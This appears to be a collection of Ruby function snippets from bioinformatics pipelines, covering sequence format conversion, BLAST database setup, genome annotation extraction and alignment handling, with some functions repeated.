"def bam2fastq(input_file, output_file, phred_quality)\n \t\tFile.open(output_file, 'w') do |output|\n\t\t\tinput_file.each do |line|\n \t\t\tline = line.strip.split(/\\s+/)\n \n \t\t\tflag = line[1].to_i\n \t\t\tflag & 0x40 > 0 ? mate = '1' : mate = '2'\n \t\t\t\n \t\t\tqname, sequence, quality = line[0], line[9], line[10] \n \t\t\toutput.puts \"@#{qname}/#{mate}\", sequence, '+', quality if Alignment.quality_ok?(quality, phred_quality)\n \t\tend\n \tend\n \t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Converted unmapped reads into fastq-format.\"\t\n\tend",
"def makedb\n # check if the query is a nucleotide sequence\n query_file = Bio::FastaFormat.open(@query)\n query_file.each do |entry|\n raise \"Query sequence looks like it's not nucleotide\" if !entry.isNucl?\n end\n\n # check if the target is a nucl or prot seq\n target_file = Bio::FastaFormat.open(@target)\n count_p=0\n count=0\n target_file.each do |entry|\n count_p += 1 if entry.isProt?\n count += 1\n end\n if count_p > count*0.9\n @target_is_prot = true\n else\n @target_is_prot = false\n end\n # construct the output database names\n @query_name = File.basename(@query).split('.')[0..-2].join('.')\n @target_name = File.basename(@target).split('.')[0..-2].join('.')\n\n # check if the databases already exist in @working_dir\n make_query_db_cmd = \"#{@makedb_path} -in #{@query}\"\n make_query_db_cmd << \" -dbtype nucl -title #{query_name} -out #{query_name}\"\n if !File.exists?(\"#{@working_dir}/#{query_name}.nin\")\n `#{make_query_db_cmd}`\n end\n\n make_target_db_cmd = \"#{@makedb_path} -in #{@target}\"\n make_target_db_cmd << \" -dbtype nucl \" if !@target_is_prot\n make_target_db_cmd << \" -dbtype prot \" if @target_is_prot\n make_target_db_cmd << \" -title #{target_name} -out #{target_name}\"\n\n db_target = \"#{target_name}.nsq\" if !@target_is_prot\n db_target = \"#{target_name}.psq\" if @target_is_prot\n if !File.exists?(\"#{db_target}\")\n `#{make_target_db_cmd}`\n end\n @databases = true\n [@query_name, @target_name]\n end",
"def seqshash_to_fastafile(seqs,filename)\n oa = Bio::Alignment::OriginalAlignment.new(seqs)\n string_to_file(oa.output(:fasta),filename)\n\n end",
"def add_result_distances_nonref(base)\n return nil unless\n result_files_exist?(base, %w[.aai-medoids.tsv .aai.db]) or\n result_files_exist?(base, %w[.ani-medoids.tsv .ani.db])\n r = MiGA::Result.new(\"#{base}.json\")\n add_files_to_ds_result(r, name, aai_medoids: \".aai-medoids.tsv\",\n haai_db: \".haai.db\", aai_db: \".aai.db\", ani_medoids: \".ani-medoids.tsv\",\n ani_db: \".ani.db\", ref_tree: \".nwk\", ref_tree_pdf: \".nwk.pdf\",\n intax_test: \".intax.txt\")\n end",
"def candidates2fa(input_file, fasta, read_length, output_file, exoncov=8)\n\t\tchromosomes = {}\n\t\tpositions = []\n\t\t\n\t\t# Input into hash sorted by chromosomes\n\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")[0..-2]\n\t\t\tchr_a, pos_a, strand_a, chr_b, pos_b, strand_b = line[0..5]\n\t\t\tpos = [chr_a, pos_a, chr_b, pos_b].join(':')\n\t\n\t\t\tchromosomes[chr_a] = {} if !chromosomes.has_key?(chr_a)\n\t\t\t\n\t\t\tif !chromosomes.has_key?(chr_b)\n\t\t\t\tchromosomes[chr_a][chr_b] = [line]\n\t\t\n\t\t\t# 2nd elsif to exclude reads that map on same junction but opposite ends\t\t\n\t\t\telsif chromosomes[chr_a].has_key?(chr_b) && !positions.include?(pos)\n\t\t\t\tchromosomes[chr_a][chr_b].push(line)\n\t\t\t\tpositions << pos\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\toutput = File.open(output_file, 'w') do |output|\n\t\t\tchromosomes.each do |chr_a, values|\n\t\t\t\tfasta_file = File.open(\"#{fasta}#{chr_a}.fa\", 'r')\n\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\tdna_a = fasta_file.read.gsub(/\\n/, '')\n\t\t\t\t\n\t\t\t\tvalues.each do |chr_b, values|\n\t\t\t\t fasta_file = File.open(\"#{fasta}#{chr_b}.fa\", 'r')\n\t\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\t\tdna_b = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\t\t\tvalues.each do |v|\n\t\t\t\t\t\tbp_a, bp_b = v[1].to_i, v[4].to_i\n\t\t\t\t\t\tstrand_a, strand_b = v[2], v[5]\n\t\t\t\t\t\toverlap = v[-1].to_i - read_length\n\t\t\t\t\t\tl = read_length - exoncov \n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\tupstream = dna_a[bp_a..bp_a + overlap + l].upcase\t\n\t\t\t\t\t\tdownstream = dna_b[bp_b - l - overlap + 1..bp_b - overlap].upcase\n\t\t\t\t\t\n\t\t\t\t\t\tif strand_a == '1' && strand_b == '-1'\n\t\t\t\t\t\t\tdownstream = Alignment.reverse_complement(dna_b[bp_b..bp_b + l].upcase)\n\t\t\t\t\t\telsif strand_a == '-1' && strand_b == '1'\n\t\t\t\t\t\t\tupstream = Alignment.reverse_complement(dna_a[bp_a - l + 1..bp_a].upcase)\n\t\t\t\t\t\tend\n\t\t\n\t\t\t\t\t\tid = [v[0..1], v[3..4]].join(':')\n\t\t\t\t\t\toutput.puts [\">#{id}\", downstream + upstream].join(\"\\n\")\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Wrote loci to fasta-file.\"\n\tend",
"def add_result_distances_ref(base)\n pref = File.dirname(base)\n return nil unless\n File.exist?(\"#{pref}/01.haai/#{name}.db\")\n r = MiGA::Result.new(\"#{base}.json\")\n r.add_files(haai_db: \"01.haai/#{name}.db\", aai_db: \"02.aai/#{name}.db\",\n ani_db: \"03.ani/#{name}.db\")\n r\n end",
"def bucketized_alignment\n # split reads into buckets according to their size and err_rate\n @buckets = bucketize(@err_rate)\n\n # perform alignment on each bucket\n @buckets.reverse_each do |lower, upper, mismatches|\n @names.set_bucket(lower, upper)\n mapped, unmapped = align(\n @ref, @ref_base, @software,\n { annotation: @annotation,\n tophat_aligner: @tophat_aligner,\n mismatches: mismatches\n }\n )\n @mapped_bams << mapped\n @unmapped_bams << unmapped\n @max_mismatches = [@max_mismatches, mismatches].max\n end\n\n # merge alignments\n @names.unset_bucket\n unbucketize(@mapped_bams, @names.get('mapped_merged'))\n unbucketize(@unmapped_bams, @names.get('unmapped_merged'))\n end",
"def before_perform \n # Init file vars \n\t @basename = File.join(job.job_dir, job.jobid)\n @infile = @basename+\".fasta\"\n @outfile = @basename+\".csblast\"\n \n # Save either the pasted Sequence from frontend or uploaded Sequence File to in file\n params_to_file(@infile, 'sequence_input', 'sequence_file')\n @informat = params['informat'] ? params['informat'] : 'fas'\n # Reformat the input sequence to match fasta format (perl script call)\n reformat(@informat, \"fas\", @infile)\n # necessary for resubmitting domains via slider\n\t File.copy(@infile, @basename+\".in\")\t\n \n # init cmd container\n @commands = []\n\n # init frontend params\n @inputmode = params['inputmode']\n @expect = params['evalue']\n @filter = params['filter'] ? 'T' : 'F'\n @mat_param = params['matrix']\n @other_advanced = params['otheradvanced']\n @descriptions = params['descr']\n @alignments = params['alignments']\n @db_path = params['std_dbs'].nil? ? \"\" : params['std_dbs'].join(' ')\n @db_path = params['user_dbs'].nil? ? @db_path : @db_path + ' ' + params['user_dbs'].join(' ')\n \n @ungapped_alignment = params['ungappedalign'] ? 'F' : 'T'\n @e_thresh = params['evalfirstit']\n @smith_wat = params['smithwat'] ? 'T' : 'F'\n @rounds = params['rounds']\n @fastmode = params['fastmode'] ? 'T' : 'F'\n @alignment = \"\"\n \n # init genome db parameter\n # getDBs is part of the GenomesModule\n gdbs = getDBs('pep')\n logger.debug(\"SELECTED GENOME DBS\\n\")\n logger.debug gdbs.join(\"\\n\")\n @db_path += ' ' + gdbs.join(' ')\n\n\n # Write confidence parameter to file in temp directory\n File.open(@basename + \".csiblast_conf\", \"w\") do |file|\n file.write(@e_thresh)\n end\n # set file rights ugo+rxw\n system(\"chmod 777 #{@basename}.csiblast_conf\")\n # if input is alignment call method process_alignment\n if (@inputmode == \"alignment\") then process_alignment end\n\n # set gapopen and gapextend costs depending on given matrix\n # default values\n @gapopen = 11\n @gapext = 1\n if (@mat_param =~ /BLOSUM80/i || @mat_param =~ /PAM70/i) then @gapopen = 10 end\n if (@mat_param =~ /PAM30/i) then @gapopen = 9 end\n if (@mat_param =~ /BLOSUM45/i) \n @gapopen = 15\n @gapext = 2\n end \n \n end",
"def add_result_distances_nonref(base)\n return nil unless\n result_files_exist?(base, %w[.aai-medoids.tsv .aai.db]) ||\n result_files_exist?(base, %w[.ani-medoids.tsv .ani.db])\n\n add_files_to_ds_result(\n MiGA::Result.new(\"#{base}.json\"), name,\n aai_medoids: '.aai-medoids.tsv',\n haai_db: '.haai.db',\n aai_db: '.aai.db',\n ani_medoids: '.ani-medoids.tsv',\n ani_db: '.ani.db',\n ref_tree: '.nwk',\n ref_tree_pdf: '.nwk.pdf',\n intax_test: '.intax.txt'\n )\n end",
"def add_result_distances_nonref(base)\n return nil unless\n result_files_exist?(base, %w[.aai-medoids.tsv .aai.db]) ||\n result_files_exist?(base, %w[.ani-medoids.tsv .ani.db])\n\n add_files_to_ds_result(\n MiGA::Result.new(\"#{base}.json\"), name,\n aai_medoids: '.aai-medoids.tsv',\n haai_db: '.haai.db',\n aai_db: '.aai.db',\n ani_medoids: '.ani-medoids.tsv',\n ani_db: '.ani.db',\n ref_tree: '.nwk',\n ref_tree_pdf: '.nwk.pdf',\n intax_test: '.intax.txt'\n )\n end",
"def fa_file\n\t\t\"#{pre}/genome.fa\" #Genome fasta location\n\tend",
"def add_result_distances_ref(base)\n pref = File.dirname(base)\n return nil unless File.exist?(\"#{pref}/01.haai/#{name}.db\")\n\n MiGA::Result.new(\"#{base}.json\").tap do |r|\n r.add_files(\n haai_db: \"01.haai/#{name}.db\",\n aai_db: \"02.aai/#{name}.db\",\n ani_db: \"03.ani/#{name}.db\"\n )\n end\n end",
"def add_result_distances_ref(base)\n pref = File.dirname(base)\n return nil unless File.exist?(\"#{pref}/01.haai/#{name}.db\")\n\n MiGA::Result.new(\"#{base}.json\").tap do |r|\n r.add_files(\n haai_db: \"01.haai/#{name}.db\",\n aai_db: \"02.aai/#{name}.db\",\n ani_db: \"03.ani/#{name}.db\"\n )\n end\n end",
"def makedb\n # only scan the first few hundred entries\n n = 100\n # check if the query is a nucl or prot seq\n query_file = Bio::FastaFormat.open(@query)\n count_p=0\n count=0\n query_file.take(n).each do |entry|\n count_p += 1 if entry.isProt?\n count += 1\n end\n if count_p > count*0.9\n @query_is_prot = true\n else\n @query_is_prot = false\n end\n\n # check if the target is a nucl or prot seq\n target_file = Bio::FastaFormat.open(@target)\n count_p=0\n count=0\n target_file.take(n).each do |entry|\n count_p += 1 if entry.isProt?\n count += 1\n end\n if count_p > count*0.9\n @target_is_prot = true\n else\n @target_is_prot = false\n end\n # construct the output database names\n @query_name = File.basename(@query).split('.')[0..-2].join('.')\n @target_name = File.basename(@target).split('.')[0..-2].join('.')\n\n # check if the databases already exist in @working_dir\n make_query_db_cmd = \"#{@makedb_path} -in #{@query}\"\n make_query_db_cmd << \" -dbtype nucl \" if !@query_is_prot\n make_query_db_cmd << \" -dbtype prot \" if @query_is_prot\n make_query_db_cmd << \" -title #{query_name} \"\n make_query_db_cmd << \" -out #{@working_dir}/#{query_name}\"\n db_query = \"#{query_name}.nsq\" if !@query_is_prot\n db_query = \"#{query_name}.psq\" if @query_is_prot\n if !File.exists?(\"#{@working_dir}/#{db_query}\")\n make_db = Cmd.new(make_query_db_cmd)\n make_db.run\n if !make_db.status.success?\n msg = \"BLAST Error creating database:\\n\" +\n make_db.stdout + \"\\n\" +\n make_db.stderr\n raise RuntimeError.new(msg)\n end\n end\n\n make_target_db_cmd = \"#{@makedb_path} -in #{@target}\"\n make_target_db_cmd << \" -dbtype nucl \" if !@target_is_prot\n make_target_db_cmd << \" -dbtype prot \" if @target_is_prot\n make_target_db_cmd << \" -title #{target_name} \"\n make_target_db_cmd << \" -out #{@working_dir}/#{target_name}\"\n\n db_target = \"#{target_name}.nsq\" if !@target_is_prot\n db_target = \"#{target_name}.psq\" if @target_is_prot\n if !File.exists?(\"#{@working_dir}/#{db_target}\")\n make_db = Cmd.new(make_target_db_cmd)\n make_db.run\n if !make_db.status.success?\n raise RuntimeError.new(\"BLAST Error creating database\")\n end\n end\n @databases = true\n [@query_name, @target_name]\n end",
"def prepare_anchorpairs(input_file, anchor_length, sequencing_type, output_file)\t\n\t\tname, mate, seq, quality = nil, nil, nil\n\t\tcounter = -1\n\n\t\tFile.open(output_file, 'w') do |output| \n\t\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\tline = line.strip\n\t\t\t\n\t\t\t\tif counter % 4 == 0 \n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 4 == 1\n\t\t\t\t\tseq = line\n\t\t\t\t\n\t\t\t\telsif counter % 4 == 3\n\t\t\t\t\tquality = line\n\t\t\t\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\t\n\t\t\t\t\tquality_A = quality[0..anchor_length - 1]\n\t\t\t\t\tquality_B = quality[-anchor_length..-1]\n\t\t\t\n\t\t\t\t\toutput.puts [name_A, seq_A, '+', quality_A, name_B, seq_B, '+', quality_B].join(\"\\n\")\n\t\t\t\t\n\t\t\t\t\tname, mate, seq, quality = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend \n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Anchor preparation finished.\"\t\n\tend",
"def getFt \n kword = ARGV[1]\n seq = @gbkObj.to_biosequence\n seqoptions = \"\" \n for c in 2..ARGV.length-1\n seqoptions += \"#{ARGV[c]},\"\n end\n # look through all features\n @gbkObj.each_cds do |ft|\n ftH = ft.to_hash\n loc = ft.locations\n gene = []\n product = []\n protId = \"\"\n if (!ftH[\"gene\"].nil? && ftH[\"gene\"][0].downcase.include?(kword.downcase)) or\n (!ftH[\"product\"].nil? && ftH[\"product\"][0].downcase.include?(kword.downcase))\n sbeg = loc[0].from.to_i\n send = loc[0].to.to_i\n fasta = Bio::Sequence::NA.new(seq.subseq(sbeg,send))\n position = \"#{sbeg}..#{send}\"\n if loc[0].strand == -1\n fasta.reverse_complement!\n position = \"c#{position}\"\n end\n pep = Bio::Sequence.new(fasta.translate)\n gene = ftH[\"gene\"][0] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"][0] if !ftH[\"product\"].nil?\n protId = ftH[\"protein_id\"][0] if !ftH[\"protein_id\"].nil?\n locustag = ftH[\"locus_tag\"][0] if !ftH[\"locus_tag\"].nil?\n if seqoptions.downcase.include?(\"pep\") or seqoptions.downcase.include?(\"prot\")\n puts pep.output_fasta(\"#{@accession}|#{position}|#{protId}|#{locustag}|#{gene}|#{product}\", 60)\n else\n dna = Bio::Sequence.auto(fasta)\n puts dna.output_fasta(\"#{@accession}|#{position}|#{protId}|#{locustag}|#{gene}|#{product}\",60)\n end\n end\n end\n end",
"def prepare_anchorpairs(input_file, anchor_length, sequencing_type, output_file)\t\n\t\tname, mate, seq, quality = nil, nil, nil\n\t\tcounter = -1\n\n\t\tFile.open(output_file, 'w') do |output| \n\t\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\tline = line.strip\n\t\t\t\n\t\t\t\tif counter % 4 == 0 \n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 4 == 1\n\t\t\t\t\tseq = line\n\t\t\t\t\n\t\t\t\telsif counter % 4 == 3\n\t\t\t\t\tquality = line\n\t\t\t\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\t\n\t\t\t\t\tquality_A = quality[0..anchor_length - 1]\n\t\t\t\t\tquality_B = quality[-anchor_length..-1]\n\t\t\t\n\t\t\t\t\toutput.puts [name_A, seq_A, '+', quality_A, name_B, seq_B, '+', quality_B].join(\"\\n\")\n\t\t\t\t\n\t\t\t\t\tname, mate, seq, quality = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend \n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Anchor preparation succeded.\"\t\n\tend",
"def map_tgup_by_geneid()\n Dir.glob(\"#{$prepare_dir}/refg/*.dat\") do |input_file|\n refseq_gene_list = []\n gene_id_prefix = input_file.split(\"/\").last.split(\"\\.\").first\n puts \"gene_id prefix: #{gene_id_prefix}\"\n File.open(input_file) do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n refseq_gene_list.push({taxid: columns[0], gene_rsrc: columns[1], gene_label: columns[2], protein_id: columns[3], gene_id: columns[4], gene_id_prefix: gene_id_prefix})\n end\n end\n\n up_list = load_up_refg(gene_id_prefix) # get same prefix data from UniProt\n refseq_gene_list.each do |refseq_data|\n match = false\n unless up_list.nil? # exist prefix list on UniProt\n match_list = up_list[refseq_data[:gene_id]]\n unless match_list.nil?\n match_list.each do |up_info|\n if refseq_data[:taxid] == up_info[:taxid]\n output_idmap(refseq_data, up_info[:upid])\n match = true\n end\n end\n end\n end\n if match == false\n $no_up += 1\n end\n end\n end\nend",
"def getFtProtID\n protein_id = ARGV[1]\n protId = \"\"\n @gbkObj.each_cds do |ft|\n ftH = ft.to_hash\n ftloc = ft.locations\n if ftH[\"protein_id\"][0].include? protein_id\n gene = []\n product = []\n gene = ftH[\"gene\"] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"] if !ftH[\"product\"].nil?\n protId = ftH[\"protein_id\"][0] if !ftH[\"protein_id\"].nil?\n locustag = ftH[\"locus_tag\"][0] if !ftH[\"locus_tag\"].nil?\n if ftloc[0].strand == -1\n location = \"c#{ftloc[0].from}..#{ftloc[0].to}\"\n else\n location = \"#{ftloc[0].from}..#{ftloc[0].to}\"\n end\n dna = getDna(ft,@gbkObj.to_biosequence)\n seqout = dna.output_fasta(\"#{@accession}|#{location}|#{protId}|#{locustag}|#{gene[0]}|#{product[0]}\",60)\n puts seqout\n end\n end\n end",
"def buildSampeCommand(read1File, read2File, read1Seq, read2Seq)\n puts \"BWA command\"\n puts @bwaPath\n puts @reference\n puts read1File + \" \" + read2File\n puts read1Seq + \" \" + read2Seq\n puts @samFileName\n cmd = \"time \" + @bwaPath + \" sampe -P \" + \n \" -r \" + buildRGString() + \" \" + @reference + \" \" +\n read1File + \" \" + read2File + \" \" + read1Seq + \" \" + read2Seq +\n \" > \" + @samFileName.to_s\n puts cmd\n return cmd\n end",
"def bulk_1(opts)\n raise BFRToolsException.new(\"Missing path for bulk 1\") if opts[:path] == nil\n path = Pathname.new(opts[:path])\n raise BFRToolsException.new(\"Unable to open #{path}\") unless path.readable? or path.directory? \n\n @bulk_1_name = opts[:name] ? opts[:name] : path.basename(\".bam\")\n @bulk_1_sam = Bio::DB::Sam.new({:fasta=>@reference_path, :bam=>path})\n @bulk_1_path = path\n end",
"def msa_replace_random(dir,msa_orig_file,seqs_rand_file,msa_rand_file)\n\n\n rs=PValues::RandomSequences.new\n\n\n #all files in same directory\n msa_orig = dir + msa_orig_file\n seqs_rand = dir + seqs_rand_file\n msa_rand = dir + msa_rand_file\n\n\n rs.gen_random_seqs(msa_orig,seqs_rand)\n\n parser = UqamDoc::Parsers.new\n seqs = parser.fastafile_to_fastastring(seqs_rand)\n\n #align\n maf = UqamDoc::Mafft.new #cw2=UqamDoc::ClustalW2.new\n job_id = maf.submit_dna(seqs) #job_id= cw2.submit_dna(seqs)\n #recuperate\n fasta_str = maf.get_msa_wait(job_id) #fasta_str = cw2.get_msa_wait(job_id)\n #puts fasta_str\n\n\n parser.string_to_file(fasta_str,msa_rand)\n\n\n\n\n\n\n end",
"def help()\n $stderr.puts \"Usage: ruby __.rb -x cross_match_output -r reference.fasta -o prefix_of_output [-m minscore -s max_substitution -g max_gap] [-c]\"\nend",
"def bam2fastq(input_file, output_file, phred_quality)\n \t\tFile.open(output_file, 'w') do |output|\n\t\t\tinput_file.each do |line|\n \t\t\tline = line.strip.split(/\\s+/)\n \n \t\t\tflag = line[1].to_i\n \t\t\tflag & 0x40 > 0 ? mate = '1' : mate = '2'\n \t\t\t\n \t\t\tqname, sequence, quality = line[0], line[9], line[10] \n \t\t\toutput.puts \"@#{qname}/#{mate}\", sequence, '+', quality if Alignment.quality_ok?(quality, phred_quality)\n \t\tend\n \tend\n \t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Converted unmapped.bam into fastq-format.\"\t\n\tend",
"def write_gff_files(gene,fo,f1,f2)\r\n bioseq_seq, chr_id, chr_cord = obtain_data_from_ebi(gene) \r\n target_hash = obtain_target_from_seq(bioseq_seq)\r\n create_features_ensembl_seq_obj(bioseq_seq,target_hash)\r\n chr_target_hash=change_cord(target_hash,chr_cord)\r\n if target_hash.empty?\r\n f1.puts \"#{gene} \\n\"\r\n else\r\n #for chr gff file, #this is for the parent gene chr_id,. --> source, \"gene\", the coordinates in the chr, . --> score, strand, . --> phase, gene_id\r\n f2.puts \"#{chr_id}\\t.\\tgene\\t#{chr_cord[0]}\\t#{chr_cord[1]}\\t.\\t+\\t.\\tID=#{gene}\"\r\n end\r\n #this is for the chromosomas, chr_id, . --> source, featuretype, cordinates of the target, . --> score, strand, . --> phase, exon id and the Parent identifiers, ID=exon00001;Parent=mrna0001\r\n chr_target_hash.each do |key,value|\r\n f2.puts \"#{chr_id}\\t.\\tinterior coding exon\\t#{key[0]}\\t#{key[1]}\\t.\\t#{value[1]}\\t.\\t#{value[0]};Parent=#{gene}\"\r\n end\r\n # each loop for write in the gff file\r\n bioseq_seq.features.each do |feature|\r\n featuretype = feature.feature\r\n next unless featuretype == \"target_CTTCTT\"\r\n position = feature.position\r\n qual = feature.assoc \r\n positionss= position.split(\"..\")\r\n fo.puts\"#{gene}\\t.\\t#{featuretype}\\t#{positionss[0]}\\t#{positionss[1]}\\t.\\t#{qual[\"strand\"]}\\t.\\t#{qual[\"interior coding exon\"]}\"\r\n end\r\nend",
"def getFtLocus\n locustag = ARGV[1]\n protId = \"\"\n @gbkObj.each_cds do |ft|\n ftH = ft.to_hash\n ftloc = ft.locations\n if ftH[\"locus_tag\"][0].eql? locustag\n gene = []\n product = []\n gene = ftH[\"gene\"] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"] if !ftH[\"product\"].nil?\n protId = ftH[\"protein_id\"][0] if !ftH[\"protein_id\"].nil?\n locustag = ftH[\"locus_tag\"][0] if !ftH[\"locus_tag\"].nil?\n if ftloc[0].strand == -1\n location = \"c#{ftloc[0].from}..#{ftloc[0].to}\"\n else\n location = \"#{ftloc[0].from}..#{ftloc[0].to}\"\n end\n dna = getDna(ft,@gbkObj.to_biosequence)\n seqout = dna.output_fasta(\"#{@accession}|#{location}|#{protId}|#{locustag}|#{gene[0]}|#{product[0]}\",60)\n puts seqout\n end\n end\n end",
"def getBAMPath()\n bamFile = Dir[\"*_marked.bam\"]\n\n if bamFile == nil || bamFile.length != 1\n return \"none\"\n else\n return Dir.pwd + \"/\" + bamFile[0].to_s\n end\n end",
"def parseReferencePath(output)\n if(output.match(/BUILD_PATH=\\s+[Ss]equence/) ||\n output.match(/BUILD_PATH=[Ss]equence/))\n @refPath = \"sequence\"\n\n elsif(output.match(/BUILD_PATH=\\s+\\/data/) ||\n output.match(/BUILD_PATH=\\/data/))\n @refPath = output.slice(/\\/data\\/slx\\/references\\/\\S+/)\n \n # Since reference paths starting with /data/slx/references represent\n # format of reference paths in alkek, change the prefix of these paths\n # to match the file-system structure in ardmore.\n @refPath.gsub!(/\\/data\\/slx\\/references/,\n \"/stornext/snfs5/next-gen/Illumina/genomes\")\n\n elsif(output.match(/BUILD_PATH=\\s+\\/stornext/) ||\n output.match(/BUILD_PATH=\\/stornext/))\n # If LIMS already has correct path corresponding to the file\n # system structure in ardmore, return that path without any\n # modifications.\n @refPath = output.slice(/\\/stornext\\/\\S+/)\n end\n end",
"def seed_extension(input_hash, anchor_length, read_length, fasta, output_file, mm = 1, max_overhang = read_length + 8)\n\n\t\toutput_hash = {}\n\t\n\t\tinput_hash.each do |chr_a, chromosomes|\n\t\t\t# Load reference\n\t\t\tfasta_file = File.open(\"#{fasta}#{chr_a}.fa\", 'r')\n\t\t\theader = fasta_file.gets.strip\n\t\t\tdna_a = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\tchromosomes.each do |chr_b, anchorpairs|\n\t\t\t fasta_file = File.open(\"#{fasta}#{chr_b}.fa\", 'r')\n \t\t\theader = fasta_file.gets.strip\n \t\t\tdna_b = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\t\t# Loop through hash to extend seeds for each pair\n\t\t\t\tanchorpairs.each do |pair|\n\t\t\t\t\tupstream, downstream = pair\n\t\t\t\t\tqname, mate, read = upstream.id.split('_')[0..2]\n\n\t\t\t\t\tupstream.strand == 1 ? upstream_read = read : upstream_read = Alignment.reverse_complement(read)\n\t\t\t\t\tdownstream.strand == 1 ? downstream_read = read : downstream_read = Alignment.reverse_complement(read)\n\t\t\t\t\t\n\t\t\t\t\tup = dna_a[upstream.start - read_length + anchor_length..upstream.start + anchor_length - 1].upcase\n\t\t\t\t\tdown = dna_b[downstream.start..downstream.start + read_length - 1].upcase\t\n\t\t\t\t\n\t\t\t\t\tif upstream.strand == downstream.strand\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.upstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.downstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start - upstream_alignmentlength + anchor_length\t\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start + downstream_alignmentlength - 1\n\n\t\t\t\t\telsif upstream.strand == 1 && downstream.strand == -1\n\t\t\t\t\t\tdown = dna_b[downstream.start - read_length + anchor_length..downstream.start + anchor_length - 1].upcase\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.upstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.upstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start - upstream_alignmentlength + anchor_length\t\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start - downstream_alignmentlength + anchor_length\t\n\t\t\t\t\n\t\t\t\t\telse\n\t\t\t\t\t\tup = dna_a[upstream.start..upstream.start + read_length - 1].upcase\t\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.downstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.downstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start + upstream_alignmentlength - 1\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start + downstream_alignmentlength - 1\n\t\t\t\t\tend\n\n\t\t\t\t\ttotal_alignmentlength = upstream_alignmentlength + downstream_alignmentlength\n\n\t\t\t\t\tif total_alignmentlength >= read_length && total_alignmentlength <= max_overhang\n\t\t\t\t\t\toverhang = total_alignmentlength - read_length\n\t\n\t\t\t\t\t\tqname = qname.to_sym\n\t\t\t\t\t\tsummary = [chr_a, upstream_breakpoint, upstream.strand, chr_b, downstream_breakpoint, downstream.strand, total_alignmentlength, mate] \n\t\t\t\t\t\t# Candidates for which both, R1 and R2, are present are deleted\n\t\t\t\t\t\t# One read can neither fall on two different non-canonical nor the same junction\n\t\t\t\t\t\tif !output_hash.has_key?(qname)\n\t\t\t\t\t\t\toutput_hash[qname] = summary\n\t\t\t\t\t\telse\n\t\t\t\t\t\t\toutput_hash.delete(qname)\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\toutput_hash.each do |qname, v| \n\t\t\t\toutput.puts [\"#{qname.to_s}/#{v[-1]}\", v[0..-2]].join(\"\\t\") if (v[2] - v[1]).abs >= read_length\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Seed extension succeded.\"\n\tend",
"def before_perform\n @outdir = job.job_dir.to_s\n @basename = File.join(job.job_dir, job.jobid)\n @infile = @basename+\".in\" \n # still has to be generated\n @outfile = @basename+\".frags\"\n params_to_file(@infile, 'sequence_input', 'sequence_file')\n @informat = params['informat'] ? params['informat'] : 'fas'\n @predict_ta = params['ta']\n reformat(@informat, \"fas\", @infile)\n @commands = []\n \n \n end",
